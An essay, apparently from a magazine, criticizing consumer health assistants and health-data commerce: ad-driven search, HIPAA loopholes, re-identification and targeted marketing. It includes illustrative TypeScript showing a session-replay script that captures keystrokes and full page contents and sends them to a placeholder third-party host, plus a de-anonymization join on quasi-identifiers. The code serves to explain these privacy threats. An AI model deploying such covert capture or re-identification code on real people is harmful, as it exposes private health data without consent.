
Heal Thyself

Self-directed health care through digital assistants replaces professional guidance with algorithmic manipulation

This past summer Libertana, a California-based assisted-living corporation, tested a voice-controlled health care assistant, based on Amazon’s digital assistant Alexa, on several elderly patients. It was designed to help users complete their own health care rituals, like exercising daily, managing medications, and communicating with nearby caregivers — enabling the elderly to take care of themselves. The app has already been praised for its potential to revolutionize the way we record and access medical information. For physicians, voice-enabled AI could eliminate the need for note taking; for patients, it could mean unprecedented access to their own records and a new ease of sharing medical information with caregivers and family members.

Libertana’s digital assistant is part of a supposed technological revolution in health care that promises to make us more autonomous in pursuing medical care and less reliant on a system that is confusing, expensive, and often unfair. In his 2015 book The Patient Will See You Now, cardiologist and futurist Eric Topol describes how new technologies, along with increased patient access to data, will empower individuals to seize control over their health and dismantle America’s flawed paternalistic system of health care. Using a Silicon Valley–inspired rhetoric of disruption and innovation, Topol argues that developments such as virtual doctor’s offices, phone-based blood tests, and centralized electronic health records will free individuals from the oppressive structures of top-down medicine, creating a radical, democratized system of care. He anticipates that access to online forums and academic journals will prompt a revolution in medical self-advocacy comparable to the rise in literacy after the advent of the printing press. “We now have the formula for freedom, for relative autonomy from the canonical medical community that forced patients to be subservient and dependent,” Topol writes. Soon, “each individual will have all their own medical data and the computing power to process it in the context of their own world.”


Innovations that promote the self-management of health care appear to be sensible cost-controlling and efficiency-generating measures at a time when medical expenditures are spiraling out of control. But these new technologies also raise questions: not only whether we can trust, let alone successfully navigate, the medical information sphere without professional guidance, but also how much personal data we should give up for the sake of advanced care.


It may seem like a useful stopgap to imagine that those marginalized by the U.S.’s current “system” of care can at least access alternate online resources for researching symptoms, medications, and the risks that come along with them. But it takes time, research skills, and basic medical expertise to orient one’s efforts, and such searches take place in an informational environment aimed primarily at corporate profit rather than human well-being.

Tech companies are eager to aid our transition from patients to consumers to “empowered users” of health care by mediating our access to medical information, but what they show us is not necessarily guided by its accuracy or relevance to our condition. Our ad hoc medical research takes place amid the same gamified systems that seek to absorb attention, maximize user engagement, and sell advertisements. Tristan Harris, a former “design ethicist” at Google, has described the ways in which apps and internet sites are built to “hijack” users’ attention and take advantage of their vulnerabilities. Patients anxiously seeking information about their own condition enter the same arena and, given their state of mind, may be even more susceptible to manipulation.

Many search engines ultimately rely on advertisements for income, so would-be self-advocates are more likely to encounter paid links the company deems relevant to them than useful information about their condition. For example, The Verge recently reported on how addicts seeking rehab facilities have been misled and exploited by paid search results.

People might turn to medical databases like WebMD to self-diagnose, but that site, owned by a for-profit company, not only includes sponsored links but also suggests related health anomalies to keep visitors engaged and online. What might start as an innocuous Google search about ovarian cysts can quickly turn into hypochondria-inducing hours reading about rare dermoids filled with hair and teeth.

When we turn to the web to guide ourselves to medical information, we inevitably expose ourselves to advertising and clickbait geared toward diverting our attention rather than informing us. In the process, we also generate a lucrative data trail for the tech companies tracking our online activity; they can sell information about our health concerns to fuel subsequent rounds of ever-more targeted advertising that perpetuates the cycle.


Even more concerning are the risks of creating a centralized, electronic database of people’s medical conditions — an Equifax for people’s health “score.” This would create a highly tempting target for abuse and exploitation by hackers, corporations, and governments alike.

In a January 2017 report for the Century Foundation, Adam Tanner traces health-care-data exploitation back to the creation of Medicare and Medicaid in the 1960s. For the first time ever, huge databases of health care information were digitized, leading to the rapid development of mass-market analysis in the 1970s. “The proliferation of digitized medical information created new commercial opportunities … for health-data-mining companies, which started buying copies of pharmacy scripts to create doctor-identified reports that detail what medications individual physicians prescribe,” Tanner writes. “Armed with such insights, pharmaceutical salespeople [were] able to tailor sales pitches carefully.”

Today, health care information is supposed to be protected under the Health Insurance Portability and Accountability Act of 1996 (HIPAA). The regulation is intended to limit the exchange of health care data between doctors, hospitals, clinics, and other official care providers according to patient permissions. But the outdated legislation does not extend to unofficial health-related services. For example, patients can manage and store their electronic health records on Microsoft’s HealthVault, but because it is a consumer-facing service, not created by and for the use of providers, it does not fall under the regulation of HIPAA.

This doesn’t mean non-HIPAA-compliant apps are without privacy protections. It’s in the best interest of data-storing services, health bots, and even diabetes-tracking apps to promise privacy, and these services are held accountable to those promises by the Federal Trade Commission. If an app’s privacy policy says it won’t share your data, it can’t. But there is a loophole: Most platforms don’t extend their privacy policies to third-party actors who might have access to your data, so many of these apps — particularly those that sell products or route you to websites that recommend nearby physicians — are actually sharing your information.

The most disturbing example of this is a recent study published on Freedom to Tinker, hosted by Princeton’s Center for Information Technology Policy, which found that many websites now use “session replay scripts,” a beefed-up version of third-party analytics that track not only the links you click and the searches you make but also “your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit.” These scripts enable third parties to obtain sensitive information — like medical data — increasing the risks of identity theft and online scams.
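To make the mechanism concrete, here is a minimal sketch of how such a script can work, written in TypeScript for a browser page. The endpoint URL, payload shape, and batching interval are all invented for illustration; commercial replay services are far more elaborate.

```typescript
// A minimal sketch of a session-replay script. Illustrative only: the
// endpoint and payload shape are invented, not any real vendor's API.

type ReplayEvent =
  | { kind: "key"; key: string; t: number }
  | { kind: "mouse"; x: number; y: number; t: number }
  | { kind: "scroll"; y: number; t: number };

const buffer: ReplayEvent[] = [];

// Capture every keystroke, including text typed into search boxes and
// form fields the user never submits.
document.addEventListener("keydown", (e) => {
  buffer.push({ kind: "key", key: e.key, t: Date.now() });
});

// Capture mouse movements and scrolling behavior.
document.addEventListener("mousemove", (e) => {
  buffer.push({ kind: "mouse", x: e.clientX, y: e.clientY, t: Date.now() });
});
document.addEventListener("scroll", () => {
  buffer.push({ kind: "scroll", y: window.scrollY, t: Date.now() });
});

// Every few seconds, ship the buffered events -- plus a snapshot of the
// entire page contents -- to a third-party analytics server.
setInterval(() => {
  if (buffer.length === 0) return;
  navigator.sendBeacon(
    "https://replay.example.com/collect", // hypothetical endpoint
    JSON.stringify({ events: buffer.splice(0), page: document.body.innerHTML })
  );
}, 5000);
```

Because the script runs with the full privileges of the page that embeds it, nothing distinguishes the field holding your search for a diagnosis from any other input it records.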

Even provider-generated data within the health care system that is protected under HIPAA is for sale — as long as it’s distributed in anonymized form. But anonymized data doesn’t always stay that way. Data mining companies can cross-check de-identified medical information with other data to create comprehensive lists of individual health histories, even without access to information labeled by name. “The ‘De-ID engine’ allows data miners to assemble a patient dossier with thousands of data points spanning back years,” Tanner writes. “The file does not include a name, but lists age and gender, as well as what section of Cleveland she lives in [for example]. Her doctors, whose information is not protected by HIPAA, can be listed by name.”
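The linking step itself is not exotic. As a rough sketch of the idea (not any vendor’s actual “De-ID engine”), re-identification can be as simple as joining a “de-identified” medical file against an outside dataset on shared quasi-identifiers like age, gender, and neighborhood. All field names and data below are invented.

```typescript
// Illustrative sketch of re-identification by record linkage. Every
// field name and value here is invented for the example.

interface MedicalRecord {
  age: number;
  gender: string;
  zip3: string; // first three digits of a ZIP code, e.g. Cleveland's "441"
  doctor: string; // doctors' names are not protected by HIPAA
  diagnosis: string;
}

interface OutsideRecord {
  name: string; // e.g. from a voter roll or marketing database
  age: number;
  gender: string;
  zip3: string;
}

// Join the two datasets on the quasi-identifiers they share. When the
// combination of age, gender, and region is rare enough, a single match
// re-attaches a name to an "anonymized" medical history.
function reidentify(medical: MedicalRecord[], outside: OutsideRecord[]) {
  return medical.flatMap((m) => {
    const matches = outside.filter(
      (o) => o.age === m.age && o.gender === m.gender && o.zip3 === m.zip3
    );
    return matches.length === 1 ? [{ name: matches[0].name, ...m }] : [];
  });
}
```

The more outside data points available (purchase histories, voter rolls, social media profiles), the fewer people each combination describes, and the more often the match is unique.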

Not only that, but a great deal of what amounts to health data is now generated outside the health care system altogether. Thanks to electronic purchase histories, social media use, wearable trackers like Fitbit, and online surveillance, data analytics firms can capture a fairly accurate image of our health without any access to conventional medical records.

As the laws protecting our private health care information lose relevance, our faith in the medical system may deteriorate. If we can’t trust that our medical records are safe in the hands of health care professionals, we may also be less likely to divulge personal information necessary for adequate care. As consumers, we are already becoming numbed to the once shocking specificity of targeted ads based on prior purchases or Googled goods, but the stakes are raised when it comes to health information. When the risks of data leaks extend to potential doxxing, job loss, and increased insurance premiums, protecting our personal data can become a matter of survival.


For platforms, maintaining a constant flow of data is paramount to both generating income and drawing in new customers. “The more activities a firm has access to, the more data it can extract and the more value it can generate from [that] data,” writes Nick Srnicek in Platform Capitalism. “Equally, access to a multitude of data from different areas of our life makes prediction more useful, and this stimulates the centralization of data within one platform.”

This suggests that data aggregators have a good reason to build versatile databases that fuse medical information with other data in order to profile individuals and calculate their vulnerabilities. As part of a strategy to lure new customers during major life events, the moments when they are most prone to form new buying habits, Target, for example, used consumer data to locate pregnant women and send discount fliers for baby supplies to their homes. But not all customers want their health-related privacy violated for the sake of coupons and corporate profits: In one instance, a teenage girl’s family found out she was pregnant after Target sent maternity coupons to her home.
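The reported mechanics are mundane: a scoring model that weights certain purchases as signals and flags customers who cross a threshold. A toy version, sketched in TypeScript, might look like the following; every product, weight, threshold, and customer here is invented for illustration.

```typescript
// Toy illustration of purchase-based health scoring of the kind
// reportedly behind Target's pregnancy predictions. All products,
// weights, thresholds, and customers are invented.

interface Customer {
  id: string;
  purchases: string[];
}

const SIGNAL_WEIGHTS: Record<string, number> = {
  "unscented lotion": 0.4,
  "prenatal vitamins": 0.9,
  "zinc supplements": 0.3,
  "oversized tote bag": 0.2,
};

// Sum the weights of signal purchases in a customer's history.
function pregnancyScore(c: Customer): number {
  return c.purchases.reduce((s, item) => s + (SIGNAL_WEIGHTS[item] ?? 0), 0);
}

// Customers whose score crosses the threshold get the maternity mailer.
const customers: Customer[] = [
  { id: "A", purchases: ["unscented lotion", "prenatal vitamins"] },
  { id: "B", purchases: ["oversized tote bag"] },
];
const flagged = customers.filter((c) => pregnancyScore(c) > 1.0);
console.log(flagged.map((c) => c.id)); // ["A"]
```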


Medical information online is presented mainly to capture and divert our attention for revenue, not necessarily to inform us. The increasing digitization of our medical data means that it can be readily aggregated, disseminated, and sold for profit without our consent. Health chatbots, which ask for our data and exist in a murky informational space outside traditional medical advocacy, appear to fuse these possibilities. If one’s request for medical advice can automatically be turned into valuable data for third parties, a virtual health care assistant can seem more like a lead generator for medical providers than an AI-driven adviser for users.

For monopoly corporations that generate their own exclusively held consumer health data — like Amazon — the opportunities for growth are endless. Amazon Web Services is HIPAA compliant and hosts the lion’s share of electronic health records, but Alexa’s systems are not. This means there are no regulations barring that platform from collecting health-related data, a boon for the company that already sells medical books and supplies and was recently approved to join the $560 billion pharmaceutical market in several states.

One can imagine the massive potential for pharma sales based on the data collected by Alexa. Whether Amazon’s AI services make it into the doctor’s office or remain in the home, a chatbot’s ability to make suggestions based on an amalgamation of users’ consumer and health data implies that the corporation could easily seize control of the market and redefine how we access and receive medical care. Pharmaceutical companies already hold sway over which medications practitioners prescribe. If Amazon becomes both the doctor and the pharmacist, we could be beholden to a corporate health monopoly that favors profit over cures.

According to Topol, it’s only a matter of time before we are constantly monitored by bloodstream nanochips and virtual physicians, but as monopoly platforms race for influence in emerging health care markets, it appears as though we’re simply witnessing a restructuring of a corporate-controlled system of medicine under the guise of self-empowerment and democratized care. For the rich, this could mean access to high-tech procedures and a substantial increase in life expectancy; for the poor, it could mean spending your final days at home with only an Amazon-powered robot to keep you company.

New regimes of data collection, aggregation, and analysis have the potential to revolutionize systems for the better, but they also threaten us with new forms of control, the ramifications of which we have only begun to consider. Like most other things in the datafied world, personalization is a byword for surveillance and regulation. As medical privacy becomes more and more unattainable and our bodies become increasingly quantified, the question becomes whether these “advancements” in care will have our best interests in mind. New health care technologies make us feel like the increased codification of our bodies leads to our own empowerment, but as we morph from patients to users we are simply shifting from one controlled environment to another.

Taylore Scarabelli is a New York-based writer whose work focuses on fashion, feminism, and technology. She has written for Dazed, Flaunt, Topical Cream, and Under the Influence, among others.